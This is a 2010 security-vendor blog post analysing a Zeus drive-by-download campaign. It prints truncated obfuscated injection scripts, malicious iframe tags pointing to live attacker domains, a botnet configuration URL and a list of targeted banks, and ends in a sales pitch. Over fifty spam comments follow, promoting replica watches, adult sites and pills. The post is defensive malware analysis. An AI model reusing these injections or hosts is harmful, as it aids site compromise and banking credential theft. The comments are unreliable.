Wednesday, June 23, 2010

More Zeus via drive-by, now improved with targeted phishing against banks

By Tufan Demir, Neil Daswani, Rajesh G.

Date first added to infection library: June 8, 2010
Infection library link: http://wam.dasient.com/wam/infection_library/cdc7f46229a8abfcad40538bfe08f1bd

The Zeus botnet has been spreading via drive-by-download since late last year (e.g. http://www.scmagazineus.com/zeus-spreading-through-drive-by-download/article/158691/), but as they say in the security community -- attacks only get better. In such previous cases, the goal of the drive-by-download was singular: have the infected client machine join the Zeus botnet and await further instructions. Dasient's researchers (using data from Dasient's telemetry systems) not only see Zeus malware continue to be distributed via drive-by-download, but such malware also has a second purpose: to distribute targeted phishing kits against the financial sector, including banks such as Citibank and HSBC. After joining the Zeus botnet, an infected machine will start keystroke logging to phish user credentials for banking web sites when the user casually visits bank home pages. In the following, we describe the technical details.

The combined Zeus/phishing kit malware drive-by-download is distributed via the malicious domain gate4ads.info (although other domains have been used as well). The gate4ads.info domain serves a malicious iframe that appears as follows on infected web pages:


<body><script language='javascript' type='text/javascript'>
var oVoid='oVoid'.substring(42997, 42997);
var yWord;
function jArcG(jArcG){return 'jArcG'};
yWord='%6b%60%68%69...


This script appears differently on each infected domain. Here's another example of the script:


<body class="dc-home"><script language='javascript' type='text/javascript'>
this.wordOn=53159;
var cEnvCont;
var pakCon='pakCon'.substring(3674, 3674);
cEnvCont='%bd%bd%bd%bb...


Even though the malicious script is polymorphic, its behavior doesn't change. It creates the following malicious iframe:

<iframe frameborder=0 src='http://gate4ads.info/t/'>

This iframe in turn creates another iframe:

<iframe src='http://itspitsp.com/elleO_o_/index.php?s=[random chars]&[random chars]' width=[random num] height=[random num] frameborder='0'>


The Malware Behavior

The binary that comes down to the user's machine is called updates.exe, and is placed in the temp folder on the user's machine:

http://www.virustotal.com/analisis/af6288cab4f0b0351ffc01a8a8386d476f423f590be47cc85c54850cc6dbf642-1276130170

The binary replaces C:\WINDOWS\system32\sdra64.exe with the new file "updates.exe" and creates a registry entry to enable it to start automatically on reboot. Creating such a registry entry is a common technique that attackers use to make sure their malware always runs even when the user reboots their machine.

This executable attempts to get the PC to join the Zeus botnet.
http://anubis.iseclab.org/?action=result&task_id=176041d5651e7ef84299f5ddb50a8b1f1&format=html

It gets the configuration file from this url:
itspitsp.com/zeusO_o_/conf13.bin

This configuration file is in encrypted format. The virus decrypts it with the key hidden in its body. The decrypted configuration file tells the virus which bank sites to monitor. When the user visits one of the following urls, the virus will intercept the traffic and present a fake webpage to steal user credentials such as account number, user id and password, transaction numbers etc. The stolen information is logged and delivered to a drop site at a later point in time.

The list of banks that are being targeted:

1. http://internetbanking.gad.de/banking/
2. http://hsbc.co.uk
3. http://www.mybank.alliance-leicester.co.uk
4. http://www.citibank.de


Source of Attack

gate4ads. info is registered in Netherlands.

Domain ID:D33147654-LRMS
Domain Name:GATE4ADS.INFO
Created On:01-Jun-2010 04:39:28 UTC
Last Updated On:01-Jun-2010 18:45:48 UTC
Expiration Date:01-Jun-2011 04:39:28 UTC
Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. dba PublicDomainRegistry.com
(R159-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:


The domain itspitsp.com resolves to a server hosted in China:

Domain name: itspitsp.com
Status: Active

Protection Status: public
( make contact info private at http://www.now.cn/domain/domainPrivate.php )

Registrant:
Name: itspitsp.com
Address: Volodarskiy
City: undefined
Province/state: IZJEVSK
Country: CN
Postal Code: 519000

Administrative Contact:
Name: itspitsp.com
Organization: itspitsp.com
Address: Volodarskiy
City: undefined
Province/state: IZJEVSK
Country: CN
Postal Code: 519000
Phone: +84.7562425583
Fax: +84.5762425583
Email:


Summary

The gate4ads .info attack is novel in that it propagates a virus with dual purposes: (1) adding end user PCs to the Zeus botnet, and (2) distributing targeted phishing and keystroke logging attacks against the financial sector. Also noteworthy is that the malware infection planted on websites is polymorphic in nature-- the javascript "attack string" injected onto each compromised legitimate website is different than the others. Thus, a signature-based approach for identifying the malware infection on websites would not succeed. Dasient's malware analysis engine, which primarily uses behavioral-based technology, identifies such malware infections every time.

According to Google, the gate4ads .info site was involved in infecting 642 other sites. (http://google.com/safebrowsing/diagnostic?site=gate4ads.info&hl=en). All of these sites, were they leveraging Dasient's Web Anti-Malware (WAM) monitoring and remediation services, would have been able to identify and contain this malware attack prior to getting blacklisted by Google. More importantly, the sites would have been able to protect their users from being infected with the virus that would add their PC to the Zeus botnet and keystroke log their banking passwords.

Financial institutions are specifically at risk from the gate4ads .info attack. If this attack was able to successfully penetrate the website of one of the banks being targeted with the keystroke logging, then all of that bank's users would be at risk for having their credentials stolen. Clearly, this would be a major security breach for the bank, and would allow the attackers to compromise large numbers of user accounts. Also as important, if it was discovered that a bank's website was compromised and was serving malware, this would result in major brand and reputation losses for the bank.

Dasient provides specific services for banks and financial institutions to secure them from web-based malware attacks. For more details, visit http://wam.dasient.com/wam/products_overview.

54 comments:

  1. www.highpagerankbacklinks.in
    This configuration file is in encrypted format. The virus decrypts it with the key hidden in its body. The decrypted configuration file tells the virus which bank sites to monitor. When the user visits one of the following urls, the virus will intercept the traffic and present a fake webpage to steal user credentials such as account number, user id and password, transaction numbers etc

    ReplyDelete
  2. Almost everything concerning fake cartier Nowadays, once i has been exploring the internet, looking for Omega look-alike timepieces and also My partner and i has been taken aback to get the identical product that has been blessed if you ask me from the omega replica business numerous years back. The particular rolex replica submariner are not reasonable considering that the look-alike Omega charges concerning a single hundredth with the authentic a single. Preserving this kind of being a yardstick, My partner and i computed the price tag on the true observe I needed with me at night and also My partner and i has been taken aback. Yet you've got handy that for the those who fake rolex uk these kinds of artificial Omega timepieces. timepieces is perfect with the exception of the particular astronomical rates which can be significantly over and above peoples' ingesting ability. Omega look-alike timepieces are usually Authentic omega replica is not going to appear under several thousands of money, whilst look-alike Omegas can supply the identical appear and feel for a couple hundred or so money. In order to acquire many well-known models of Omega look-alike timepieces for your watches replica uk regarding just one single authentic observe. made together with each depth 100% mirrored the particular omega replica kinds. They will characteristic clean travelling across, second palm as well as the sporty bezel and also excellent fake rolex uk They may be thus just like the genuine kinds in which also the particular observe professionals have got Good quality Omega artist look-alike timepieces will be like a dream be realized for many who constantly dreamt regarding possessing the particular brand name yet can by no means manage that.

    ReplyDelete
  3. Whether a identifying stable used its own matters now for the superb stamping, it a fabulous wise trademark file format to make sure you rolex replica subsequently feature superb public relations or possibly ignited version making (vs. an excellent bargain, dumbed off rendition from the stamping offerings) For that reason and not just wishing to burberry replica cover up simultaneously draws to a close for the discounts continuum, it safer to construct a fully cutting edge trademark for those lower priced offerings. Which all the dior replica essential trademark isn't really diluted. All the pivot phase about rolex replica splendor is normally secured for courtesy. One example is, a customer about mine was first unable how to improve an individual's tuxedo home business. It was eventually content 9-11 and therefore the state of mind was first chanel replica anything but joyful. Pictures quizzed the dog the things home business the person was a student in, the person was first taken aback, "Tuxedos surely! ". For that matter the person was first no cost development about tuxedo home sellers. Then Document prodded the dog once. "Do men of all ages want to utilize big, tight-fitting, extravagant tuxedos? " The person reckoned in a few moments and reacted basically no.

    ReplyDelete
  4. He used the cash from his work from house company to pay for the provides he required to fix the various oral issues that came to his workplace. 1call.ms

    ReplyDelete
  5. So, as a hobby economist, I actually followed this post and can see how silly it is to put a straight line on the graph. click here

    ReplyDelete
  6. He used the cash from his work from house company to pay for the provides he required to fix the various. Top SEO services

    ReplyDelete
  7. Maybe a way of looking at the problem that could shed more light would be to include the underemployed and the ones who have given up in a "total unemployed" headcount, and see how that stacks up. Read This

    ReplyDelete
  8. Selanjutnya sila konsultasikan dengan pembimbing dan kalau pembimbing sudah acc bisa diserahkan softcopy nya ke. http://lipozenepillreviews.webs.com/glucomannan

    ReplyDelete
  9. So while we are assured the highly effective company activities that provide actual value are here to stay. decoration

    ReplyDelete
  10. Yes, he fooled me into thinking that he was going to change. What a mistake I made in thinking he could change. But this artical has helped me to realize I am winning my freedom. useful source

    ReplyDelete
  11. Yes, he fooled me into thinking that he was going to change. What a mistake I made in thinking he could. Victory Martial Arts

    ReplyDelete
  12. President Jean-Paul Huchon determined the period by welcoming all FMDV founder associates to fulfill at the first FMDV Common Assembly and its first Panel of Administrators on the 5th of Apr 2011 in Cairo during Town the legislature. mail fraud attorney

    ReplyDelete
  13. This season, true to type, the problem is late increasing. It has been so gradually that. assurance australie

    ReplyDelete
  14. President Jean-Paul Huchon determined the period by welcoming all FMDV founder associates to fulfill at the. shemale webcams

    ReplyDelete
  15. We are committed to helping our customers to optimize their operations throughout the season. The cultivation of sweet sorghum enables growers to use land and water resources more efficiently. free microsoft points

    ReplyDelete
  16. The ego cannot think about being deceased. It has no way of it. But there is another aspect of interest that not only can understand it, but already knows about it. Klik4D

    ReplyDelete
  17. However, the powerful reveals that offer a real value to the market ongoing to flourish and some have now exceeded their pre-recession levels. [source]

    ReplyDelete
  18. However, the powerful reveals that offer a real value to the market ongoing to flourish and some have now. Best tattoo shops in Chicago

    ReplyDelete
  19. However, the powerful reveals that offer a real value to the market ongoing to flourish and. professional house cleaning

    ReplyDelete
  20. He serves as an example to others to take a risk and test new technologies. If the technology works, and in this case it seems that it does, it’s a win for everyone. pinterest

    ReplyDelete
  21. well i have to admit i just came over this virus and it almost wiped everything out. I have to say i am a transgender ts model and i try very hard to keep my pc working well and do all the checks that is needed as i cannot afford down time. i searched everywhere for an article like this and it has explained what i needed to know. I work live here atParagrafi cams online

    ReplyDelete
  22. Contractors and other participants need to create time dedication to be present at the Show and do their preparation in advance so they know who they want to see and what they want to talk about. TUBE

    ReplyDelete
  23. If you need some item or set up details, it is often much much better to find your solutions on the internet than to contact. agen bola terpercaya 

    ReplyDelete
  24. They mentioned with me how water program is a constant career and a excellent way to generate an income. venus factor weight loss

    ReplyDelete
  25. One nice thing about being the first company to buy the vehicles is that Robichaud is fairly much engaged in any style changes that may be made to your vehicle. after reading about Alexei Beltyukov

    ReplyDelete
  26. In Apr, Wayne Bruggers of The Courier-Journal had written a popular content on the effect of fossil fuel ash on Stick Rune Road citizens and their fight with LG&E. Best Chicago Tattoo Parlors

    ReplyDelete
  27. Moreover to monitoring moment-to-moment threats such as an beginning car or a decrease banister, our threat verifying starts to intuit a distant but progressively approaching dark thinking — the approaching end, the biggest boundary.

    ReplyDelete
  28. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Thanks for such post and please keep it up. Mike Livak

    ReplyDelete
  29. The first beer sourced from Salmon-Safe hops grown in Oregon's Willamette Valley. Here at Salmon-Safe, our mantra is "Drink like a fish. Salmon need clean water and so do you." Susan McGall

    ReplyDelete
  30. Thanks to an wide range of mobile cellphone programs and thinking handling, companies can often find out out most of the facts they need, and handle their day, without ever speaking with the house company office. Jason Halpern

    ReplyDelete
  31. Why not let the bubble burst, the recession linger for a year or two and then let the market and entrepreneurs get us out of this hole. Sultan Alhokai

    ReplyDelete
  32. I am a big fan of Knut Wicksell's theory of interest, prices and the cumulative process and have often felt his understanding of the rise and fall of prices has been over looked. Sam Tabar

    ReplyDelete
  33. I am a big fan of Knut Wicksell's theory of interest, prices and the cumulative process and have often felt his understanding of the rise and fall of prices has been over looked. http://ireport.cnn.com/docs/DOC-1149856

    ReplyDelete
  34. It is our objective to generate the first Power Van for 90 times and find out all of the technicalities that might come with an EV or if there are any style changes we would like to have involved with upcoming vehicles,” said Robichaud. Lee G. Lovett

    ReplyDelete
  35. I lately taken up with Indicate Halligan, CEO of H+A Worldwide, Chicago, illinois, il, about the very subject of organization events. Indicate has a success of experience with preparing organization events and he has hand to create AHR the effective display that it is nowadays. the truth about cellulite book

    ReplyDelete
  36. As almost everyone’s expenses knowledgeable, many organizations had to cut back on their display participation and the wide variety of individuals they sent to be existing at activities was considerably reduced. Consequently, some reveals stopped to are available or became much smaller versions of their halcyon periods. this site here

    ReplyDelete
  37. As we age this careful system changes. Moreover to monitoring moment-to-moment threats such as an beginning car or a decrease banister, our threat verifying starts to intuit a distant but progressively approaching dark thinking — the approaching end, the biggest boundary. old school new body amazon

    ReplyDelete
  38. I'm so glad I didn't do that, I'm still just beginning but I can see how valuable having more stitch options is going to be and I've already started using some of them. amateur slut

    ReplyDelete
  39. Hey Joy, I actually took it down because it needed to be done again (it wasn’t as easy to follow as I’d like). Detox Tea UK

    ReplyDelete
  40. What other contractor can say they were involved in the design process of an all-electric service vehicle? Not many! Robichaud is a great example of a contractor on the cutting-edge of technology. visit site

    ReplyDelete
  41. Aside from just letting him chew on the links, I also used a chain of them to hook up toys to the stroller bars, so he could freely play with them but they won't drop to the floor. Just remember to buy spare filters, light bulbs and the powercable. f4x protocol reviews

    ReplyDelete
  42. Clinton applied guidelines from the Right that only a Democrat would have been able to apply. click to investigate

    ReplyDelete
  43. Good quality Omega artist look-alike timepieces will be like a dream be realized for many who constantly dreamt regarding possessing the particular brand name yet can by no means manage that. see post

    ReplyDelete
  44. Thanks for some other informative website. The place else may I am getting that kind of info written in such a perfect method? I have a challenge that I am just now operating on, and I’ve been on the look out for such info friv | friv 1 | friv 2014 | Z6 games

    ReplyDelete
  45. The greater the variety, the less likely it is that moisture build-up or condensation will form on the cup. Keeping moisture build-up or condensation from developing can help decrease the chance that pattern can grow around the supports. address

    ReplyDelete
  46. Although writing and material promotion for 100 % 100 % free guide does not pay you directly, it does provide the prospective for making money via product/class/service sales on your website. the venus factor reviews

    ReplyDelete
  47. Don't use a residence broker to offer your residence. residence brokers will continue to perform to offer your home fast. Quick Sale House

    ReplyDelete
  48. You have some really good ideas in this article. I am glad I read this. I agree with much of what you state in this article. Your information is thought-provoking, interesting and well-written. Saran Wrap Weight Loss

    ReplyDelete
  49. Each topographical range has unequivocal circumstances that are terrifying to made protecting frameworks. reference link

    ReplyDelete
  50. I've already started using some of them. There wasnt a major growth but my boobs were a little more plump and full. Disappointed that it did not include a miter guide. I have even made adjustments so I can throw in a little ground flavored coffee while still using the grinder. Buy My Property

    ReplyDelete
  51. I am very happy with what you convey this in your web. And I want to share some specific information, may be received here. previous post and I thank you for her great.
    Kami membawa sebuah informasi yang cukup menarik menurut kami, info ini berkaitan dengan apa yang di butuhkan kaum pria remaja maupun yang sudah berkeluarga. info tersebut sebagai berikut. toko jual obat pembesar penis dan alat terapi penis, Berbagai macam obat herbal dan alat terapi tercanggih di dunia telah di hadirkan untuk membantu pria” di dunia.

    ReplyDelete
  52. This is a little bit much less serious side-effect wherein the tummy or the stomach area from the person produces a typically, swollen overall look. click to read

    ReplyDelete